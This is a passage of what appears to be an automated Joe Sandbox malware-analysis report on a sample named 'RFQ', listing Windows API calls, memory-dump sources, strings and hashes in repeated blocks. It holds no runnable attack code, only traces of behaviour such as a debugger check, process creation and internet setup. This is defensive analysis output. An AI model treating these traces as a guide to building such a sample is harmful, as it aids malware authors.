                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006FCC9B
                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 006FCCC4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$OpenOption
                                                                            • String ID: <local>
                                                                            • API String ID: 942729171-4266983199
                                                                            • Opcode ID: aabe040ece79bc3b2a729a2eeb9c03aabc5dc82d27a4282f158268d5af2e8ba7
                                                                            • Instruction ID: 2b78eb7afb125178468ff98bea5ffad56cf5c635a78a6386ef75874259196154
                                                                            • Opcode Fuzzy Hash: aabe040ece79bc3b2a729a2eeb9c03aabc5dc82d27a4282f158268d5af2e8ba7
                                                                            • Instruction Fuzzy Hash: F611E97124163EB9D7384B668D49EF7BE9DEF127B4F004216B21D93180D3649841D6F0
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 007133DE
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007133ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: edit
                                                                            • API String ID: 2978978980-2167791130
                                                                            • Opcode ID: b14cbcb9b0eba79cb2fbfda6bdbbb749da7eee54f47d0ac16b392ec4b329f430
                                                                            • Instruction ID: a5449555eff9f122e900d0b5e321fe0e5cf5a51f7a78860bf4baabff12920b15
                                                                            • Opcode Fuzzy Hash: b14cbcb9b0eba79cb2fbfda6bdbbb749da7eee54f47d0ac16b392ec4b329f430
                                                                            • Instruction Fuzzy Hash: 3B118C71500208AFEF118EA8DC44AFB3B6AEB15374F608714F974971D0CB79EC919B64
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 006E6C0C
                                                                            • _wcslen.LIBCMT ref: 006E6C18
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharUpper
                                                                            • String ID: STOP
                                                                            • API String ID: 1256254125-2411985666
                                                                            • Opcode ID: fd0f71300f09a27a10efe26a39f8ea38c144f24eeae794f8108d8da031ba8d00
                                                                            • Instruction ID: e14174d2e8a8a569c925cec7bd10eb197ef048c1ecbc268f5e9f1ef7ac041ee2
                                                                            • Opcode Fuzzy Hash: fd0f71300f09a27a10efe26a39f8ea38c144f24eeae794f8108d8da031ba8d00
                                                                            • Instruction Fuzzy Hash: C701E1325116668ACB10AEBECC849BF77A6EA71B507200528F8A197290EB70D8018654
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 006E3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 006E3C12
                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006E1C90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 624084870-1403004172
                                                                            • Opcode ID: e7c01c7e9edfc527263dbfad71af0cd4fcb445430a303944cf99836c792d68ff
                                                                            • Instruction ID: 6099ac2cca7852397db14102066309792227c669d7cd47878344b14e7a60651b
                                                                            • Opcode Fuzzy Hash: e7c01c7e9edfc527263dbfad71af0cd4fcb445430a303944cf99836c792d68ff
                                                                            • Instruction Fuzzy Hash: 3D0122B0A522646B8B04EBA6CC558FE336AAF063507100609E8339B3C1EA349809D724
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 006E3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 006E3C12
                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 006E1B8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 624084870-1403004172
                                                                            • Opcode ID: 3ca5ac6522c7d876fd83c5521c09f9b144934a90f2b8ef7d9480b929f42fa851
                                                                            • Instruction ID: e08f994cb153800738f28c7104aff1c09d3953116a0b57cb6cf4199ea30ed14d
                                                                            • Opcode Fuzzy Hash: 3ca5ac6522c7d876fd83c5521c09f9b144934a90f2b8ef7d9480b929f42fa851
                                                                            • Instruction Fuzzy Hash: 1201F7B1A422486BCB14FBA2C865EFE73AA8F16380F100059F4027B381FB609E09D775
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 006E3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 006E3C12
                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 006E1C0C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 624084870-1403004172
                                                                            • Opcode ID: ed2a626e5807e5f07e7c7d4f93ca7cfe99ecb32e1f2c18dd6713a14ed6528953
                                                                            • Instruction ID: 62d43a99266ce184fc42eaa10a6b0b56f080a928123bdc5a4daee49ed6a38473
                                                                            • Opcode Fuzzy Hash: ed2a626e5807e5f07e7c7d4f93ca7cfe99ecb32e1f2c18dd6713a14ed6528953
                                                                            • Instruction Fuzzy Hash: F801A7B5B8224867CB14FBA6C9559FE73AA8B12740F101059B402BB382EA658E099775
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 006E3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 006E3C12
                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 006E1D17
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 624084870-1403004172
                                                                            • Opcode ID: 4f7c17419e9f87f78e81be32bd7735a0eb83eae043941ad189d52b351375a3b6
                                                                            • Instruction ID: 9198ce8c27a6af184d83382be85875c505b49f664cd263918c6daa539c337223
                                                                            • Opcode Fuzzy Hash: 4f7c17419e9f87f78e81be32bd7735a0eb83eae043941ad189d52b351375a3b6
                                                                            • Instruction Fuzzy Hash: DBF0F971B5235867CB14FBA6CC56BFE736AAF02340F100559B4226B3C2EB75590CC268
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00753008,0075304C), ref: 007180B1
                                                                            • CloseHandle.KERNEL32 ref: 007180C3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: L0u
                                                                            • API String ID: 3712363035-2045255414
                                                                            • Opcode ID: 1dd9ff17cb24ca442df54ab216cd9bace940fa70e336ff8fe5e4840d10ea551c
                                                                            • Instruction ID: 69d6a5079e9c24db682530c839582ac90e7a40ee6e681200c138146e919d4d27
                                                                            • Opcode Fuzzy Hash: 1dd9ff17cb24ca442df54ab216cd9bace940fa70e336ff8fe5e4840d10ea551c
                                                                            • Instruction Fuzzy Hash: EBF054B1580304BAF31167646C45FF7795DEB05791F408020BA0CD91F1D6BD4E5486AD
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: 3, 3, 16, 0
                                                                            • API String ID: 176396367-3261555341
                                                                            • Opcode ID: b34fb189116798308bc132447991a8cbf0c288ff38e1be29c4f4a2d56cde10f0
                                                                            • Instruction ID: 8c5dd5f9bd9044e241b1b2cb121329772758dccb6faa2d9f48d1070248dde2aa
                                                                            • Opcode Fuzzy Hash: b34fb189116798308bc132447991a8cbf0c288ff38e1be29c4f4a2d56cde10f0
                                                                            • Instruction Fuzzy Hash: A5E02B4660539090E2782279BCC197F92C9EFCA750710142FFC81C22E5EFD8DC92E3A0
                                                                            APIs
                                                                              • Part of subcall function 0069F8A8: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006A0CF1,?,?,?,0068100A), ref: 0069F8AD
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0068100A), ref: 006A0CF5
                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0068100A), ref: 006A0D04
                                                                            Strings
                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006A0CFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                            • API String ID: 55579361-631824599
                                                                            • Opcode ID: 598a4c029ad3ca2d7d3dc269866ceea1d9bfdd32e22c5b9b26efed289f999204
                                                                            • Instruction ID: 373e8e70228913794264c62beb4c5e74db5ae8a7aa1b421852221166463d427f
                                                                            • Opcode Fuzzy Hash: 598a4c029ad3ca2d7d3dc269866ceea1d9bfdd32e22c5b9b26efed289f999204
                                                                            • Instruction Fuzzy Hash: 21E06D746407008BE7A0BFACD8043827BE5BF00741F00CA2CE486C6691DBF8E8888BA1
                                                                            APIs
                                                                            • __Init_thread_footer.LIBCMT ref: 0069E3A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID: 0%u$8%u
                                                                            • API String ID: 1385522511-2666027011
                                                                            • Opcode ID: 27b46499d2928d72cfc32c2c2bb732bf00c3d6f554593e642f260c41f9356cd3
                                                                            • Instruction ID: cc9fcf1baa6c1bacb17ce8ce61081fc905ccd85c38fc054b3f1580380aee65dd
                                                                            • Opcode Fuzzy Hash: 27b46499d2928d72cfc32c2c2bb732bf00c3d6f554593e642f260c41f9356cd3
                                                                            • Instruction Fuzzy Hash: A8E02631058A14CBDE04EF18F8549C8335BEB27332B1041FCE40187693EB6A6C438A0C
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 006F2F4D
                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 006F2F62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$FileNamePath
                                                                            • String ID: aut
                                                                            • API String ID: 3285503233-3010740371
                                                                            • Opcode ID: 0f3e39e200a56831f8c495bc157206f6825e4b263c7252de14562dfc3a4cb724
                                                                            • Instruction ID: 8194006ec57ab22685aeeacd5d318cbbca74debdb740c3652cf29cb53fa70ba7
                                                                            • Opcode Fuzzy Hash: 0f3e39e200a56831f8c495bc157206f6825e4b263c7252de14562dfc3a4cb724
                                                                            • Instruction Fuzzy Hash: F5D05B7254031467DA6097D89C0DFC73A6CD705750F0085517655D50D1DAB49544C694
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime
                                                                            • String ID: %.3d$X64
                                                                            • API String ID: 481472006-1077770165
                                                                            • Opcode ID: c048301eaddf9a76f6ae0786710ff5cd69bc20012af5ff783f7161b2d9bd23ec
                                                                            • Instruction ID: 4c00d0c25805bec0e6ae2011ec97443af35b1dc9f8fbe2a20bf02d23fcf943e9
                                                                            • Opcode Fuzzy Hash: c048301eaddf9a76f6ae0786710ff5cd69bc20012af5ff783f7161b2d9bd23ec
                                                                            • Instruction Fuzzy Hash: EED01265C09108D6CB80ABD0DC458B9777EBB08300F54C453F906E1140E7388549AB21
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0071225F
                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00712272
                                                                              • Part of subcall function 006EE899: Sleep.KERNEL32 ref: 006EE911
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 7f641acf2a724dea262e06577284e0fc1f446b03ee993767369b5c26d5470386
                                                                            • Instruction ID: 2a64d5d66b090caf58196d5fcd3f91605ac92fdb2fdf071e1b3554b8b0ec6adb
                                                                            • Opcode Fuzzy Hash: 7f641acf2a724dea262e06577284e0fc1f446b03ee993767369b5c26d5470386
                                                                            • Instruction Fuzzy Hash: E9D0A9713D03007AE260A3B8AC0FFCAAA149B00B00F01C8067609AA1C0C8A8A800CA08
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0071229F
                                                                            • PostMessageW.USER32(00000000), ref: 007122A6
                                                                              • Part of subcall function 006EE899: Sleep.KERNEL32 ref: 006EE911
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 410f33b5e852c5290f1ac42144d6be5e1c172beedd5bea358ecc87f5b13b9c50
                                                                            • Instruction ID: 9bf9c2977fb342324a7b7c7a41cc63483d3abd8c93ab0b18f1d093a0f1f81d06
                                                                            • Opcode Fuzzy Hash: 410f33b5e852c5290f1ac42144d6be5e1c172beedd5bea358ecc87f5b13b9c50
                                                                            • Instruction Fuzzy Hash: 09D0A9713C03003AE260A3B8AC0FFCAAA149B05B00F01C8067609AA1C0C8A8A800CA08
